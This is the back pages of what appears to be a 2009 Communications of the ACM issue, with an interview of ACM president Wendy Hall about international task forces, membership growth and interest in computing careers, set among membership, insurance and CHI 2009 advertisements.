Call Marsh Affinity Group Services at 1-800-503-9230 or visit www.personal-plans.com/acm. 


3132851 35648 (7/07) © Seabury & Smith, Inc. 2007

The plans are subject to the terms, conditions, exclusions and limitations of the group policy. For costs and complete details of coverage, contact the plan administrator. Coverage may vary and may not be available in all states.

*Underwritten by The United States Life Insurance Company in the City of New York, a member company of American International Group, Inc.

**Underwritten by American General Assurance Company, a member company of American International Group, Inc.

***Coverage is available through Assurant Health and underwritten by Time Insurance Company.

MARSH Affinity Group Services, a service of Seabury & Smith
AG5217


[CONTINUED FROM P. 112] our first meeting this February, in London. There are already lots of different computer societies in Europe, and they do a lot to energize and support the research base. We're trying to find out what we could do to help and collaborate.


What’s your time frame for all of this?

We'd like to see the councils for China, India, and Europe set up and running their own meetings by the end of financial year ’09, which technically finishes in June. We’re also planning more events like the educational summit in China. Hopefully, we’ll have something in India in 2010, and we’re looking to have an event in Europe, as well. Then we’ve got to think about Central and South America, and Africa. It’s a big world.


You've also been talking about 
growing ACM’s membership. 

ACM has had steady growth, and we reckon we can get to an even 100,000. But when you think about it, there are hundreds of thousands of people, millions, who work in this area across the world. So we’ve just started a debate, which we’re going to run this year: What would it mean if we tried to double our membership? How would it change ACM?


Sounds like there’s a lot to be done.

There is a lot of responsibility, but it’s also great fun. I’ve always enjoyed working with and for ACM, and because of its international role you feel that you can really have an impact.


What else is on the agenda?

The other big part of our agenda is improving the image of the field and the health of the discipline. This is all in collaboration with other organizations, like the National Science Foundation and members of the media. We've seen a dramatic drop in the numbers of people interested in careers in computing, and we’re working on several projects to help turn this around.

Such as?

Public broadcaster WGBH, in Boston, does a lot to encourage young people to go into science and engineering. So we're working with them to look particularly at Latina and African-American girls. The Educational Policies Committee is also looking at ways to move computing and computer science into the mainstream of policy thinking.

On a more personal note, you were recently honored as Dame Commander. How did that feel?

It is, of course, a huge honor, and thrilling for me and my family. But I think it’s also good for the computing community to have one of its own recognized in this way.

Leah Hoffmann is a Brooklyn-based technology writer.


last byte


Take Advantage of ACM's Lifetime Membership Plan!

ACM Professional Members can enjoy the convenience of making a single payment for their entire tenure as an ACM Member, and also be protected from future price increases by taking advantage of ACM's Lifetime Membership option.

ACM Lifetime Membership dues may be tax deductible under certain circumstances, so becoming a Lifetime Member can have additional advantages if you act before the end of 2008. (Please consult with your tax advisor.)

Lifetime Members receive a certificate of recognition suitable for framing, and enjoy all of the benefits of ACM Professional Membership.

Learn more and apply at:
http://www.acm.org/life
Our Dame Commander


Wendy Hall discusses her plans to increase ACM’s membership 
and to create task forces in China, India, and Europe. 


A PROFESSOR OF computer science at the University of Southampton and the winner of numerous awards and honors, such as her recent appointment as Dame Commander of the Order of the British Empire, Wendy Hall was elected president of ACM in July 2008.


You're the third female president of ACM, and the first non-North American president. How does that feel?

For me, it’s more exciting that I’m the first non-North American president. A lot of times you don't like to do things just because you’re a woman; you want to do stuff because you're the best person to do it, in the whole competitive field.


What are your plans for ACM? 

ACM is in a good position, with 92,000 members and counting, and we had a fantastic year last year. But we mustn’t be complacent. Broadly speaking, I want more people to join ACM, and I want more women to join ACM. ACM is a U.S.-based organization, but it reaches out to the whole world through its publications and conferences.


What will you be doing to support 
those international members? 

We’re developing a series of task forces to explore what ACM can do in particular areas of the world: China, India, Europe. We need to ask: What can we do to support each of these cultures in their own context?


How will the task forces operate?

The task forces are geographically based, and [ACM CEO] John White is working very hard to get a good-quality, diverse membership. The idea is that we start off with a task force, and as it matures, it will become a council in that region. We also want the task force chairs to come to New York and be a part of our discussions. It would be hopeless if it were always done at a distance.


What’s been accomplished thus far?

In November, we held a summit largely aimed at Chinese educators. It was very successful, but we want to build on it. There’s a huge amount of computing activity in China. At the moment our work is in Beijing (and we’ll arrange a meeting of the ACM China Council later in the year), but we must expand it to Shanghai and Hong Kong and other regions. We also have an embryonic task force in India, which held its first meeting in early February.


And in Europe? 


We, too, held [CONTINUED ON P. 111] 


PHOTOGRAPH BY JON BANFIELD


CONNECT WITH OUR
COMMUNITY OF EXPERTS.

They'll help you find the best new books and articles in computing.

www.reviews.com

Computing Reviews is a collaboration between the ACM and Reviews.com.


NEW WORLD 


Join us in Boston, MA for the 27th Annual CHI Conference, the premier international forum for all aspects of human-computer interaction. Computing is reaching into all parts of modern life. CHI 2009 brings together people working on the design, evaluation, implementation, and study of interactive computing systems for human use. CHI serves as a forum for the exchange of ideas among computer scientists, human factors scientists, psychologists, social scientists, system designers, usability professionals, and end users.


www.chi2009.org 